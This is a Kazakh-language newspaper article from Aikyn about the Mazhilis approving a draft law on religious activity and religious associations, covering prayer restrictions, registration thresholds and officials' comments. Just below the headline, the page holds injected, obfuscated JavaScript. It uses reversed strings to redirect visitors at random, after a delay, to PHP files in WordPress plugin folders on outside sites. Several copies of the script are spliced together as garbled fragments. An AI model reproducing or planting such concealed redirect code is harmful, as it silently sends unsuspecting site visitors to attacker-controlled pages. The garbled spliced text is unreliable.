Жаңа «Дін заңының» жаңалығы неде?

 

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}top» colspan=»2″ />

Мәжіліс кешегі жалпы отырысында «Діни қызмет және діни бірлестіктер туралы» заң жобасын ақыры мақұлдады. Мемлекет басшысы бұл туындыны қабылдау мерзімін келер жылдың басына белгілеген болатын. Бірақ қалаулылар «жоспарды асыра орындады». Заң жобасы бойынша Мәжілістегі жұмыс тобының жетекшісі Рамазан Сарпеков, тіпті «күніне екіден-үштен жұмыс тобының отырысын өткізуге тура келгендігін» еске алады. «Елбасы осы заңның қажетті екендігін айтқан, — дейді ол, — Мемлекет басшысының тез арада депутаттардың осы іске араласып кетуі керектігін ескерткендігін ескере отырып, біз өте ынталы түрде жұмыс жасадық. Парламент қабырғасында жүргеніме 10 шақты жыл уақыт болған екен. Дәл осындай қарқынды жұмыс көргенім — алғашқы рет!»

«Діни қызмет және діни бір­лестіктер туралы» заң жобасының кіріспесінде бұл құжаттың Қазақ­станды діни емес, «зайырлы мем­лекет ретінде орнықтыруға» ба­ғыт­талғандығы көрсетіледі. Яғни бар­лық баптар, бірі қалмай, осы мақ­сатқа жұмылдырылған. Кіріс­педегі «осы заң Қазақстан Рес­пуб­ликасы азаматтарының, діни на­нымына қарамастан, тең құқылы болуына кепілдік беретінін» бел­гілейтін нормасына депутаттар Т.Қадамбаев пен Р.Сарпеков бір­лесе, өзгеріс ұсынды. Қос депутат та «Қазақстан Республикасы аза­маттарының» деген сөздерді «әр­кімнің» деген сөзбен ауыстыруды ұсынды.
Заң кіріспесінде, сондай-ақ бұл заңның «халықтың мәдениеті мен діни өмірін дамытуда ханафи бағы­тындағы ислам және православтық христиан діндерінің тарихи рөлін танитыны, Қазақстан халқының діни мұрасымен үйлесетін басқа да діндерді құрметтейтіні» айтылған.
Қалаулылар кешегі жиын­да­рында дінге қатысты екі заң жо­ба­сын қараған болатын. Оның бі­ріншісін — «Діни қызмет және діни бірлестіктер туралы» жобаны па­лата бірден мақұлдап, Жоғарғы палатаға ұзатты. Ал оған ілеспе құжат — басты заңның қабыл­дануы­на байланысты қолданыстағы 12 заңды түзететін «Кейбір заңна­малық актілерге діни қызмет және ді­ни бірлестіктер мәселелері бойынша өзгерістер мен толық­тырулар енгізу туралы» жобасы әзірге бірінші оқылымда қаралып, екінші оқылымға әзірлеуге жі­берілді. Жұмыс тобының жетекшісі заң жобаларының редакциялық, техникалық жағын жақсартуға үлес қосқан депутаттар қатарында Нұр­тай Сабильянов, Розақұл Хал­мура­дов, Жарасбай Сүлейменов, Ермұ­ханбет Омаровты атады, осы қа­лаулылар «кейбір қажет нор­ма­ларды ұсыныпты». «Олардың бар­лығы қабылданды» деді Р.Сарпеков. Қабылданбағаны — депутат Бек­болат Тілеуханның үш бабы.
Айтпақшы, заңның 7-бабы, 3-тар­мағының 2-тармақшасында Қарулы күштер, басқа да әскерлер мен әскери құралымдардың, сот және құқық қорғау органдарының ғимараттарында және оларға бөлінген аумақта» діни жоралар мен рәсімдерді, миссионерлік қыз­метті жүргізуге жол берілмейтіндігі қадап айтылып отыр.
Мәжілісте ғана емес, қоғамда ең қызу пікірталас заң жобасының 7-бабы айналасында жүрді. Бұл бап «Діни жоралар мен рәсімдер» де­ген атауға ие. Оның 3-тармағы діни жоралар мен рәсімдерді, сондай-ақ миссионерлік қызметті «діни оқу орындарын қоспағанда, білім беру ұйымдарының ғимараттарында және оларға бөлінген аумақта өт­кізуге (жасауға) жол бермейді». Бек­болат Тілеухан осы жерде діни жо­ралар мен рәсімдерді бұдан «құт­қарып», тек миссионерлік қыз­метке ғана тыйым салуды ұсынған. «Осы норма Конституцияның 22-бабына айқын қайшы келеді, — дейді депутат. — Осы заң жобасының да 3-бабының 5-тармағында діни қызметке заңсыз кедергі жасауға жол берілмейді деп көрсетілген». Бекболат Қанайұлы Исламда намаз оқу міндетті діни ереже болып та­былатындығын еске салады. «Егер мешіт алыста болса, жұмыс­тағы адам немесе адам ауруханада жат­са, ол намазды қайда оқуға тиіс?» дейді қалаулы.
Жақында ғана құрылған Дін істері жөніндегі агенттік төрағасы Қайрат Лама Шариф «көп пікірталас тудырып жатқан» жеке бас намаз оқу мәселесі бойынша өздерінің «жан-жақты пікірлерді тыңда­ған­дарын, сарапқа салғандарын» ай­тады.
Дін істері жөніндегі агенттік бас­шысы тағы бір «қызықты» дәлел келтірді. Ол, ең алдымен Қазақ­станда 130 ұлттың өкілдері тұра­тындығын тілге тиек етті. «Әрбір ұлттың өзінің ұстанатын діндері бар, — дейді ол, — тіпті бізде 6 пайыз атеист бар. Егер бір мекемеде 5-6 қызметкер жұмыс істейді десек, оның біреуі — христиан болса, екін­шісі — мұсылман дінін ұстанса, үшін­шісі атеист болса, егер ол бөлмеде артық бос жер болмаса, мұ­сылман қалай намаз оқиды? На­маз оқу үшін құбыла жаққа қарау керек. Егер құбыла жаққа қарағаны оның бастығының үстеліне бағыт­талса, онда атеист үшін оның басты­ғына қарап намаз оқитынын біл­дірт­пей ме? Немесе құбыла жақтағы қабырғада икона тұрса, атеист «со­ған қарап оқи ма?» деп ойламай ма?!» Бұл заң атеисті ондай қалың ойлардың қаумалауында қалудан құтқарғалы отыр.
Қайрат Лама Шариф иманға ұйыған жамағатқа жұмыс орын­да­рынан, білім алатын жерінен, ауру­ханадан, тағы басқа орындардан ке­тіп, намазды мешітке барып оқуға кеңес береді. «Бізде 2 800-ге жуық ғибадатханалар бар, олардың 2500-і — мешіттер, — дейді діни агент­тік басшысы. — Мешіттер қазір қалалардың кез келгенінде толып жатыр. Алматының өзінде 35 мешіт, Астанада 8 мешіт, тағы салынып жатқаны бар. Сондықтан біз оларға намазды мешітке барып оқы деп, үгіттеп жатырмыз. «Намаз оқыма!» деген сөз жоқ бұл жерде. Ал бірақ ка­бинетімде оқимын деген… Кейбір депутаттардың кабинеттері ғана ыңғайлы болуы мүмкін, бірақ былайғы қызметкерлердің каби­неттерінде 7-8 адамнан, мүмкіндік жоқ».
Заң жобасы әйтеуір әуежайлар, сауда орталықтары, қонақүйлер, басқа да жеке меншік қарауындағы орындардағы намазханаларға тиіс­пейді екен. Қазақстан — жаһандық ірі жиындар өтетін ордаға айналды, келімді-кетімді кісі көбейе түспек. Оның үстіне, биыл ресми Астана Ислам Ынтымақтастығы ұйымына төрағалық етуде. Егер намаз оқу бөлмелерін әлгі орындарда да жауып тастасақ, Қазақстан Ислам ді­нін ұстанатын шетелдік мейман­дардың қарсылық-кейісінің ас­тында қалмай ма?
— Егер мешіт жақын болса, сон­да оқығанның өзінің сауаптылығы әрі пайдалылығы бар, бұл мұсылман үшін де, айналасындағы басқа дін өкілдері үшін де тиімді деп санай­мыз! — деп түйді Дін істері жөніндегі агент­тік төрағасы Қайрат Лама Ша­риф.
Бұл жерде тағы бір мәселе қал­ды. Егер өзі жаратпайтын әлдебір қызметкердің мемлекеттік мекеме­де намазға жығылып жатқан үстінен түскен бастық осыны сылтауратып, оны жұмыстан қуып жіберуі мүмкін ғой? «Жоқ! — дейді діни агенттік бас­шысы, — ондай жазаға тарту мә­селесі әкімшілік кодексте, құқықта қарастырылмаған. Жұмыс орнында намаз оқыған жағдайда оған еш­қандай айыппұл салынбайды. Еш­қандай жазаға тартылмайды. Бұл осы заңға қосалқы екінші заң жо­басында көрсетілген».
Қазақстанда жұмыс істейтін кей­бір секталар өз жақтаушыларына ел мүддесіне қажетті істерді, мә­селен, әскерге баруға тыйым сала­ды. Осыған орай заң жобасының «Мемлекет және дін» деп аталатын 3-бабының 7-тармағы «Ешкімнің де өз діни нанымдарын себеп етіп, Қа­зақстан Конституциясы мен заң­дарында көзделген міндеттерін атқарудан бас тартуға құқығы жоқ» деп бекітті. Дәл осы бап Қазақстан азаматы болып табылатын «діни қыз­метшілерге, миссионерлерге, діни бірлестіктердің басшысы не­месе қатысушысы (мүшелері) бо­лып табылатындарға» өз атынан саяси өмірге қатысуға да рұқсат бе­реді.
Осы баптың 8-тармағының 1 тармақшасы егер баланың өмірі мен денсаулығына қауіп төндірмесе, құқығына қысым жасалмаса, мем­лекеттің «ата-аналардың немесе олардың өзге де заңды өкілдерінің балаларды өз нанымдарына сәйкес тәрбиелеуіне араласпайтындығын» нықтайды. Бұл тармақшаға депутат Б.Бекжановтың ұсынысымен, ол тәрбиенің «Қазақстанның конс­титуциялық құрылысына, егемен­ді­гіне, аумақтық тұтастығына қарсы бағытталмауы» шарты да қосыл­ды.
Заңмен Қазақстан аза­мат­та­рына, еліміздегі шетел­діктерге және азаматтығы жоқ адамдарға зорлық-зомбылық көрсететін, олар­дың денсаулығына басқа да зияндар келтіретін, отбасын ыды­ратып, ерлі-зайыптылардың некесін бұзуға және туыстық қарым-қа­тынастарды тоқтатуға ықпал ете­тін, адамның құқықтары мен бос­тан­дықтарын бұзатын, азаматтарды Ата заң мен ұлттық заңнамада көзд­ел­ген міндеттерді орындаудан бас тар­туға мәжбүрлейтін діни бір­лес­тіктердің, секталардың қызметіне тос­қауыл қойылмақ.
Тағы бір маңызды жаңалық: заң­ның 3-бабының 14-тармағы діни бірлестіктің қатысушыларын, мүшелерін және ұстанушыларын өздеріне тиесілі мал-мүлікті сол діни бірлестіктің, оның басшы­ларының немесе басқа да өкілде­рінің атына жазып, солардың қо­лына тапсыруға мәжбүрлеуге тыйым салғалы отыр. Ал әлдебір ау­қаты бар адамның басын айнал­дырып, соның ақшасы мен дүниесін өз иелігіне көшірту — шетелде қалталы қолдаушысы жоқ көптеген секталардың және секта ашып ал­ған қарау ниетті жандардың басты табыс көзі екендігі құпия емес.
Заң жобасы уәкілетті органның құзыретін бекітеді: ол дінтану са­рап­тамаларын жүргізеді, діни бірлестіктерді құрушы бастамашы-азаматтардың тізімінің тексерілуін қамтамасыз етуге тиіс. Сондай-ақ діни қызмет пен діни бірлестіктер заңнамасының бұзылуына қатысты азаматтардың және заңды тұлға­лардың өтініштерін де осы орган қарайтын болды. Сонымен бірге шетелдік діни орталықтар Қазақ­стан­дағы өз бірлестіктерінің бас­шыларын тағайындамас бұрын, ол кандидатураға діни агенттіктің ке­лісімін алуға міндетті болмақ. Мы­салға, Қазақстандағы православ шір­кеуінің митрополиттері және бас­қа басшылары Мәскеуден және Ре­сей азаматтары арасынан та­ғайындалады.
Айтқандай, Қазақстандағы кез кел­ген мекеме немесе ұйым бұдан былай өз кітапханалық қорына діни әдебиетті, діни мазмұндағы өзге де ақпараттық материалдарды алмас бұрын, оларға дінтану са­рап­тамасын сұратуға міндет­теле­ді.
Заңда діни жоралар мен рә­сімдерді өткізу үшін жергілікті биліктің рұқсатын алуды қарас­тыратын норма да бар. 7-баптың 2-тармағы «Құдайға құлшылық ету, діни жоралар, рәсімдер және (не­месе) жиналыстар ғибадат үй­ле­рінде және оларға бөлінген ау­мақта, құлшылық ету орындарында, діни бірлестіктер мекемелерінде, зираттар мен крематорийлерде, салттық қажеттілік туындаған жағ­дайда, жақын тұратын адамдардың құқықтары мен мүдделерін сақтау шартымен, үйлерде бөгетсіз жүр­гізіледі (жасалады)» деп келеді де, келесі сөйлемде: «Өзге де жағ­дай­ларда діни іс-шаралар жиналыстар, митингілер, демонстрациялар мен шерулер өткізу үшін белгіленген тәртіппен жүзеге асырылады» де­лін­ген. Ал митингілер мен шеру­лерді өткізуге рұқсат беру-бер­меуді және оны қай жерде өткізуді жергілікті билік шешетіні белгілі.
Тағы бір маңызды өзгеріс: жо­баның 9-бабының 2-тармағы діни әдебиетті, діни мазмұндағы өзге де ақпараттық материалдарды, діни мақсаттағы заттарды тек ғибадат үйлерінде, діни білім беру ұйым­дарында, сондай-ақ облыстардың және Алматы мен Астананың жер­гілікті атқарушы органдары арнайы белгілеген стационарлы пана­жай­ларда ғана таратуға болатынын бе­кітеді. Яғни қазіргідей көшеде қандай да бір секта не дін өкілінің уағыз кітабын тықпалауы — заң­сыз!
Жаңа заң, діни бірлестіктерді «жер­гілікті», «өңірлік» және «рес­пуб­ликалық» деп үш мәртебеге бөл­гелі тұр. Бұл жерде «жергілікті діни бірлестік» болып, ең кем де­генде 50 Қазақстан азаматының бас­тамасы бойынша құрылған, бір облыстың, не Алматы мен Астананың шегінде ғана әрекет ететін бірлестік танылады. «Өңірлік» болу үшін діни бірлестік ең кем дегенде 500 тұр­ғынның бастамасымен іргесі қа­лануы қажет. Бұл ретте әлгі бес жүз — екі және одан да көп жергілікті діни бірлестіктің мүшесі және ең кем дегенде екі облыстың өкілі болуға тиіс. Өңірлік діни бірлестік сол облыстар ауқымында ғана діни қыз­метті жүзеге асыра алады. «Рес­публикалық» статус алу үшін діни бірлестікті құруды қолдап, кем дегенде 5000 Қазақстан азаматы қол қоюы қажет. Және де бұл бес мың қазақстандық барлық облыс­тардың, Астана мен Алматы қа­лаларының атынан өкілдік етуі ке­рек. Бұл ретте әр облыс пен қос бас шаһардың үлесіне кем дегенде 300 тұрғыннан келуі керек. Рес­публикалық діни бірлестіктің Қа­зақ­станның бүкіл аумағында өз құ­рылымдық бөлімшелері (фи­лиал­дары мен өкілдіктері) болуы шарт.
Әрине, көлденең көк атты қа­зақстандықтардың наным-сенімін қалыптастыруға, діни тәрбиелеуге құқылы бола бермеуге тиіс. Сон­дықтан «Діни қызмет және діни бірлестіктер туралы» заң жобасына сәйкес, діни бірлестіктің төрт ны­шан-белгісінің болуы талап етілгелі отыр. Яғни діни бірлестіктің біріншіден, ортақ діни ілімі болуы қажет. Екіншіден, оның қызметі діни жораларды, рәсімдер мен уа­ғыздарды орындаумен байланысты болғаны жөн. Үшіншіден, өз ұстану­шыларын діни тәрбиелеумен айна­лысуы керек. Төртіншіден, қызметі рухани бағдарланған болуға тиіс.
Заңмен діни бірлестіктерді мем­лекеттік тіркеу, ол тіркеудің кү­шін жою, діни бірлестікті қайта ұйым­дастыру және тарату мә­селелері реттеледі, тіпті құжатта ді­ни бірлестіктің жарғысының маз­мұнына қатысты талаптар да бел­гіленген. Онда мемлекет пен шетел­дік діни ұйымдар арасындағы қа­рым-қатынасты реттеуге де тал­пы­ныс жасалған.
Төменгі палатадағы талқылаулар ке­зінде Дін істері жөніндегі агент­тік басшысы Қайрат Лама Шариф ұсынған күйінен елеулі өзгермеген «Діни қызмет және діни бірлестіктер туралы» заңының жобасын Мә­жілістің кешегі жалпы отырысына қа­тысқан 96 қалаулының 95-і жақ­тады, жалғыз депутат қалыс қалды. Енді бұл заңжобаны өздерінің жал­пы отырыстарында сенаторлар қа­­райды. Олар қабылдаған соң, құ­­жат қол қою үшін Елбасыға жол­да­нады.

Айхан ШӘРIП

айқын газеті


{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика